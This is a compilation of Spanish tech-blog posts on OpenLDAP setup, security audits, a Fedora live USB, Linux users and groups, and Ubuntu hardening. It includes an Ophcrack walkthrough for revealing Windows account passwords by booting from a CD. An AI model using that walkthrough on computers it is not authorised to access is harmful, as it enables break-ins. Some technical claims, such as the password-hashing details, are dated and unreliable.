member: uid=otro_usuario,ou=People,dc=mi_dominio,dc=com
member: uid=un_usuario_mas,ou=People,dc=mi_dominio,dc=com
– snip –

Fuente: http://kwame.informatux.net/?p=100

Pero para comenzar, empecemos por el principio.
- Que es LDAP?
LDAP (Lightweight Directory Access Protocol) es un protocolo a nivel de aplicación que permite el acceso a un servicio de directorio ordenado y distribuido para buscar diversa información en un entorno de red. LDAP también es considerado una base de datos (aunque su sistema de almacenamiento puede ser diferente) a la que pueden realizarse consultas.

- Y entonces, que es OpenLDAP?
Se trata de una implementación libre del protocolo que soporta múltiples esquemas por lo que puede utilizarse para conectarse a cualquier otro LDAP.

Tiene su propia licencia, la OpenLDAP Public License. Al ser un protocolo independiente de la plataforma, varias distribuciones Linux y BSD lo incluyen, al igual que AIX, HP-UX, Mac OS X, Solaris, Windows (2000/XP) y z/OS.

OpenLDAP tiene tres componentes principales:

* slapd – demonio LDAP autónomo.
* syncrepl – opción para replicar ldap
* Rutinas de biblioteca de soporte del protocolo LDAP.
* Utilidades, herramientas y clientes.

- Cómo lo instalo y como lo configuro?
Este howto se va a enfocar a como instalar OpenLDAP y cómo configurarlo en CentOS ya que es la distribución que utilizo en mis servidores.

La instalación es trivial

yum install openldap openldap-clients openldap-servers

Esto como superusuario.

Para usuarios novatos siempre resulta útil enterarse de que archivos instaló yum, para dar un vistazo a los paquetes que instaló yum se puede hacer con un

rpm -ql openldap
rpm -ql openldap-clients
rpm -ql openldap-servers

El siguiente paso es crear un directorio en donde OpenLDAP va a guardar su base de datos

Leer más…

(Editado por Fernando Ortega: Juan Pecantet nos envía este artículo sobre auditorías de seguridad. No nos indica ninguna referencia sobre la procedencia del artículo, pero por el interesante contenido, lo publicamos)

La información es el activo mas importante para las empresas, lo cual se puede confirmar si consideramos el hecho de la perdida de información critica, y la post recuperación con la cual la entidad podría retomar sus operaciones normales en un menor tiempo, que si ocurre lo contrario. Por este motivo la información adquiere una gran importancia para la empresa moderna debido a su poder estratétigo y a que se invierten grandes cantidades de dinero en tiempo de proporcionar un buen sistema de información para tener una mayor productividad

La importancia en que radica auditoria de sistemas en las organizaciones son:

- Se puede difundir y utilizar resultados o información errónea si los datos son inexactos o los mismos son manipulados, lo cual abre la posibilidad de que afecte seriamente las operaciones, tomas de decisiones o la imagen de la empresa.

- Las computa, servidores y centros de base de datos se han convertido en blanco para fraudes, espionaje, delincuencia y terrorismo informático.

- La continuidad de las operación, administración y organización de la empresa no debe permanecer en un sistema mal diseñado, ya que podría convenirse en un serio peligro para la empresa.

- Existen grandes posibilidades de robo de secretos comerciales, información financiera, administrativa, la transferencia ilícita de tecnología y demás delitos informáticos.

- Mala imagen e insatisfacción de los usuarios  porque no reciben el soporte técnico adecuado o no se reparan los daños de hardware ni se resuelven los problemas en un lapso razonable, es decir, el usuario percibirá que está abandonado y desatendido permanentemente, esto dará una mala imagen de la organización.

- En el Departamento de Sistemas se observa un incremento de costos, inversiones injustificadas o desviaciones presupuestarias significativas.

- Evaluación de nivel de riesgos en lo que respecta a seguridad lógica, seguridad física y confidencialidad.

- Mantener la continuidad del servicio, la elaboración y la actualización de los planes de contingencia para lograr este objetivo.

- El inadecuado uso de la computadora para usos ajenos a la organización que puede llegar a producir problemas de infiltración, borrado de información y un mal rendimiento.

- Las comunicaciones es el principal medio de negocio de las organizaciones, una débil administración y seguridad podría lograr una mala imagen, retraso de negocios, falta de confianza para los clientes y una mala expectativa para la producción.

La Auditoria de la Seguridad Informática en la informática abarca el concepto de seguridad física y lógica. La seguridad física se refiere a la protección de hardware y los soportes de datos, así también como la seguridad del los edificios y las instalaciones que lo albergan. Esto mismo contempla situaciones de incendios, inundaciones, sabotajes, robos, catástrofes naturales, etc.

Por su parte la seguridad lógica se refiere a la seguridad del uso de software, protección de la información, procesos y programas, así como el acceso ordenado y autorizado de los usuarios a la información.

El auditar la seguridad de los sistemas, también implica que se debe tener cuidado que no existan copias piratas, o bien que, al conectarnos en red con otras computadoras, no exista la posibilidad de transmisión de virus.

En la auditoria para aplicaciones de internet se produce una verificación de los siguientes aspectos:

- Evaluación de los riesgos de Internet (operativos, tecnológicos y financieros) y así como su probabilidad de ocurrencia.

- Evaluación de vulnerabilidades y arquitectura de seguridad implementada.

- Verificar la confidencialidad e integridad de las aplicaciones y la publicidad negativa como consecuencia de ataques exitosos por parte de hackers.

Metodología de trabajo de Auditoria

El método del auditor pasa por las siguientes etapas:

- Alcances y Objetivos de la Auditoria Informática.

- Estudio inicial del entorno auditable.

- Determinación de los recursos necesarios para realizar la auditoria.

- Elaboración de Plan y de los Programas de trabajo.

- Actividades propiamente dichas de la auditoria.

- Confección y elaboración del informe final.

Como he dicho antes las comunicaciones son la base de los negocios modernos, pues sin las mismas ninguna empresa podría sobrevivir. Para esta razón, es necesario que las organizaciones mantengan a sus servidores, datos e instalaciones lejos de los hackers y piratas informáticos.

La privacidad de las redes es un factor muy importante ya que las empresas se sienten amenazadas por el crimen informático. El mantener una red segura fortalece la confianza entre los clientes de la organización y mejora su imagen corporativa, ya que muchos son los criminales informáticos que acechan día a día.

Por lo cual el auditor o consultor informático ayuda a mantener la privacidad de las redes, trabajando en los siguientes factores: Disponibilidad – Autentificación – Integridad – Confidencialidad

Es preciso tener en cuenta todos los factores que puedan amenazar la privacidad y no solamente los intencionados. Desde el punto de vista de los usuarios, los peligros derivados de los incidentes del entorno o de errores humanos que alteren la red pueden ser tan costosos como los ataques intencionados. La seguridad de las redes y la información puede entenderse como la capacidad de las redes o de los sistemas de información para resistir, con un determinado nivel de confianza, todos los accidentes o acciones malintencionadas, que pongan en peligro la disponibilidad, autenticidad, integridad y confidencialidad de los datos almacenados o transmitidos y de los correspondientes servicios que dichas redes y sistemas ofrecen o hacen accesibles.

Las principales amenazas o riesgos que enfrentan las empresas que utilizan las redes son:

- Interceptación de las comunicaciones.

- Acceso no autorizado a ordenadores o Redes de ordenadores

- Perturbación de las redes.

- Ejecución de programas que modifiquen o dañen los datos.

- Declaración falsa.

- Accidentes no provocados.

- Robo de datos.

- Infiltración de datos críticos.

Los beneficios de un sistema de seguridad son:

- Aumento de la productividad

- Aumento de la motivación del personal

- Compromiso con la misión de la compañía

- Mejoras de las relaciones laborales

- Mejoras del rendimiento

- Mayor profesionalismo

- Ayuda a formar equipos competentes

- Mejora los climas laborares de los RR.HH

Desarrollar un sistema de seguridad significa “planear, organizar, coordinar dirigir y controlar las actividades relacionadas a mantener y garantizar la integridad física de los recursos implicados en la función informática, así como el resguardo de los activos de la empresa”.

Etapas para implementar un sistema de seguridad

- Introducir el tema de seguridad en la visión de la empresa.

- Definir los procesos de flujo de la información y sus riesgos en cuento a todos los recursos participantes.

- Capacitar a los gerentes y directivos, contemplando el enfoque global.

- Designar y capacitar supervisores de área.

- Definir y trabajar sobre todo las áreas donde se pueden lograr mejoras en menor tiempo.

- Mejorar las comunicaciones internas

- Identificar claramente las áreas de mayor riesgo corporativo y trabajar con ellas planteando soluciones de alto nivel

- Capacitar a todos los trabajadores en los elementos de seguridad básica, riesgo de manejo de software y seguridad física.

Fuente: http://www.shellsec.net/articulo/auditoria-empresas/

Fedora – Linux

Las ventajas de poder instalar Linux en un Pendrive USB es que podemos usar siempre nuestros programas y archivos a dónde vayamos sin tener que instalar nada en la PC dónde se corra. Otra característica importante es que es inmune a los virus y estamos seguros que no hay ningún programa spyware instalado en la PC por lo que genera más confianza si usamos una máquina ajena.

El Linux a instalar es Fedora. Mucha gente está ya familiarizada con Ubuntu y Fedora es la otra gran alternativa para usuarios caseros en cuanto a Linux. Fedora se actualiza muy frecuentemente y usa siempre lo más nuevo en software para mantenerse a la vanguardia (aun más que Ubuntu). Quizás les suene más el nombre de Linux Red Hat, el cual está basado en Fedora.

El Live USB de Fedora tiene dos propiedades muy importantes: es No destructivo y Persistente.

No destructivo: Esto quiere decir que cuando instalamos Fedora Linux en el USB no se pierde la información que está guardado en éste. No hay que formatear ni modificarlo de ningún tipo, el resultado es que si por ejemplo tenemos música guardada en el pendrive la vamos a seguir teniendo después y si queremos desinstalar el Linux no se pierde nada.

Persistente: Podemos reservar un espacio en el pendrive para poder guardar programas y archivos que va a usar el Fedora. Así podemos instalar programas directamente en el Pendrive sin tocar el disco rígido. Además si estamos trabajando en un archivo y nos tenemos que ir y sacar el Pendrive, la próxima vez que lo usemos podemos seguir trabajando con el archivo. Ésto simplemente no se puede hacer con un Live CD.

Pasos:
1. Si estan usando Windows XP o Vista deben descargar el LiveUSB-Creator y una vez descargado descomprimanlo en cualquier lugar del disco rígido y corran el archivo liveusb-creator.exe (el programa no instala nada así que no se preocupen). link de descarga: https://fedorahosted.org/releases/l/i/liveusb-creator/liveusb-creator-2.7.zip

2. Acá tienen dos opciones, como ven en la imagen de arriba pueden o bien descargar el LiveCD de Fedora y usar el LiveUSB creator para instalarlo en el Pendrive o pueden dejar que el creator lo baje por su cuenta. Yo recomiendo bajarlo por separado en algun lugar del disco y luego usar el creator. Para bajar la última versión de Fedora (el creator funciona para Fedora 8, 9 y superiores) vayan al sitio oficial donde pueden elegir descarga directa o a través de BitTorrent.
Bajen la versión i386 Install CDs si van a usar el liveUSB en PCs viejas o el x86_64 install CDs si lo van a usar en PCs más nuevas como (Core 2 Duo de Intel o Athlon64, X2 o Phenom de AMD)

3. Si no quieren bajar Fedora aparte salteen este paso y pasen al punto 4. Si descargaron el archivo .ISO aparte lo que tienen que hacer es hacer click en Browse y luego buscar y hacer doble click sobre el archivo que descargaron.

4. Ahora lo único que hay que elegir es cuánto espacio queremos reserar para que use el Fedora. Si elegimos por ejemplo 300 Mb vamos a tener ese espacio para instalar programas y guardar los archivos que vamos a usar dentro dentro de Linux. El resto del espacio del pendrive queda libre para poner archivos de múscia, imágenes o lo que se les de la gana. Una vez que decidan el espacio de reserva en la marcador de Persistent Overlay le pueden dar click al botón Create Live USB y esperar a que se instale el Fedora dentro del pendrive.

Ahora pueden conectar el pendrive en una PC y bootear en Linux sin tener que modificar nada. Se pueden conectar a Internet, ver videos, escuchar música, escribir documentos todo sin instalar nada en la PC, es más ni siquiera tiene que tener disco rígido para usarla.

Este es un “tutorial” para averiguar claves de equipos que se nos olvidaron. El mejor programa para este fin es el Ophcrack, ya que a diferencia de otros, NO LAS BORRA, LAS VISUALIZA.

Empecemos con el tutorial:

Para este tutorial, he creado un usuario “Administrador” con contraseña “Hola” y otro usuario “Usuario1″ con contraseña “!1234?”. Lo he realizado con el Ophcrack Live para XP, pero funciona del mismo modo para Windows Vista.

1º Vamos a reiniciar el equipo para meternos en nuestra BIOS. La forma de entrar, suele ser con F2, SUPR o DEL.

Haz clic en la imagen para agrandar

2º Comprobamos que la unidad CD-ROM es la unidad elegida para el arranque.

Haz clic en la imagen para agrandar

3º Metemos el CD, y reiniciamos el equipo. Se iniciará automáticamente desde el CD, y pasados unos segundos, nos aparecerá un menú en el que seleccionamos Ophcrack Graphic Mode

Haz clic en la imagen para agrandar

4º Esperaremos unos minutos a que cargue el programa y nos aparecerá una ventana en la que el proceso de visualización de contraseñas comienza automáticamente. La ventana será como esta:

Haz clic en la imagen para agrandar

5º Dejaremos al programa actuar durante unos minutos, dependiendo de la complejidad de la contraseña. Al utilizar la versión gratuita, sólo nos aparecerán las contraseñas que tengan los caracteres alfanuméricos. Si no la puede hallar, aparecerá “not found” y si la cuenta no tiene contraseña aparecerá “empty”. Tras unos minutos veremos aparecer las contraseñas más sencillas:

Haz clic en la imagen para agrandar

Haz clic en la imagen para agrandar

6º Ya solo nos queda salir del programa, sacar el CD, y reiniciar el equipo. Entraremos en Windows XP con la sesión Administrador, de la cual ya sabemos la contraseña.

Haz clic en la imagen para agrandar

Tema: Usuarios y Grupos en Linux
Autor: Raul Rodas Hinostroza
E-mail: raul@linuxcentro.net
Web: www.linuxcentro.net

USUARIOS Y GRUPOS

Linux es un sistema operativo multiusuario y multitarea, esto es, que más de un usuario puede trabajar en el sistema de forma simultánea con otros, ejecutando una o más tareas a la vez.

Cuando se ingresa al sistema, es necesario que se identifique con un login y una contraseña, el login es un nombre que identifica de forma única al usuario. La contraseña debe ser una combinación de letras, números y caracteres especiales.

El sistema de contraseñas en Linux es de tipo unidireccional. Esto quiere decir que nuestra contraseña no es almacenada como texto, sino que es cifrada y guardada tal como es. Cuando entramos en el sistema y escribimos nuestra contraseña, ésta es cifrada y comparada con la que está almacenada. Si coinciden, la identificación es positiva, si no coinciden, no hay identificación.

Actualmente, en los sistemas GNU/Linux se puede escoger dos tipos de cifrado posibles para las contraseñas de usuario: 3DES que se viene usando desde los inicios de UNIX, tiene el inconveniente que sólo permite contraseñas de 8 caracteres, si se escriben mas se ignoran, el otro tipo es MD5 con el que podemos usar contraseñas de la longitud que deseamos, por seguridad se recomienda utilizar el tipo MD5.

Los grupos son siempre expresiones lógicas de organización, reuniendo usuarios para un propósito común. Los usuarios dentro de un mismo grupo pueden leer, escribir o ejecutar archivos que pertenecen al grupo.
Los usuarios en GNU/Linux

Existe 3 tipos de usuarios:

1. Usuario Normal: es un individuo particular que puede entrar en el sistema, con más o menos privilegios que harán uso de los recursos del sistema. Como indicador en el prompt utiliza el símbolo $ (dólar). Ejemplo: raul, sergio, mrodriguez, etc. También se les conoce como usuarios de login.

2. Usuarios de Sistema, son usuarios propios del sistema vinculados a las tareas que debe realizar el sistema operativo, este tipo de usuario no puede ingresar al sistema con un login normal. Ejemplo: mail, ftp, bin, sys, proxy, etc. También se le conoce como usuarios sin login.

3. root (superusuario), todo sistema operativo GNU/Linux cuenta con un superusuario, que tiene los máximos privilegios que le permitirán efectuar cualquier operación sobre el sistema, su existencia es imprescindible ya que se encarga de gestionar los servidores, grupos, etc.

Archivos relacionados

Toda la información de los usuarios y grupos se guarda en los siguientes archivos:
Leer más…

Linux en un sistema operativo muy seguro. Pero si dejamos una instalación sin configurar algunos detalles, esa seguridad puede verse comprometida.La seguridad en Ubuntu Linux es algo que no podemos dejar de lado. Aquí voy a dejar algunas cuestiones básicas que muchas veces pasamos por alto y dejan vulnerable nuestro sistema operativo.

1 – Debemos asegurarnos que el disco rígido este seleccionado en primer lugar en la secuencia de arranque de nuestra PC. Con esto evitamos:

* que alguien utilice un CD de instalación de Linux para tener acceso como root
* que usen un Live CD que permita ver, compartir y/o destruir nuestro disco rígido completo
* que alguien instale otro sistema operativo sobre nuestro Ubuntu Linux

2 – Debemos establecer una contraseña para la BIOS de nuestra PC. Esto impide que un desconocido cambie la secuencia de arranque de la PC.

3 – La PC debe estar en un lugar seguro. Cualquiera que tenga acceso físico a la PC puede retirar la batería de la placa y volver a ponerla, reseteando la contraseña de la BIOS.

4 – Asegurarnos que la contraseña de nuestro sistema operativo Linux Ubuntu no es fácil de averiguar. Nuestra contraseña debe tener como mínimo 8 caracteres para ser segura. La mejor contraseña es la que combina caracteres numéricos y alfanuméricos con mayúsculas y minúsculas.

5 – Debemos asegurarnos que el historial de los comandos de la consola de Ubuntu Linux esta desactivado. Aunque a veces es más fácil encontrar un comando que usamos mucho en el historial, esto puede provocar que alguien vea cuales fueron nuestras últimas acciones en Linux y deliberadamente arruinar nuestro trabajo. Por otro lado, tener que escribir los comandos una y otra vez nos permite aprender “por la fuerza” los comandos del sistema operativo Linux Ubuntu.

6 – Desactivar la combinación de teclas Ctrl + Alt + Del en modo consola. Esto impide que alguien pueda reiniciar Linux sin permiso.

7 – Asegurarnos que el modo interactivo para mover, copiar y eliminar archivos esta activo en el modo consola. Esto impide que la inexperiencia con el sistema operativo Linux nos lleve a cometer errores en el manejo de archivos.

8 – Para el trabajo cotidiano conviene hacer login como usuario normal. Si ingresamos como root podemos accidentalmente borrar o modificar archivos del sistema, y no siempre sabemos como arreglar este tipo de situaciones en Linux.

9 – Siempre es conveniente ejecutar las tareas administrativas usando el comando “sudo”. En Linux usar el comando “sudo” nos permite auditar nuestras acciones y corregirlas si fuera necesario. Lo que hacemos con el comando “sudo” queda registrado en /var/log/auth.log. Podemos revisar este archivo para ver cuales fueron nuestras últimas acciones y descubrir cual de ellas provoco el problema para luego corregirlo.

10 – Ubuntu Linux es un sistema operativo muy seguro. Pero aun así es conveniente instalar un cortafuegos como Firestarter. Un cortafuegos no garantiza la seguridad de nuestro sistema operativo, pero es nuestra primera defensa ante un ataque proveniente de la red.

fuente: dragonjar.org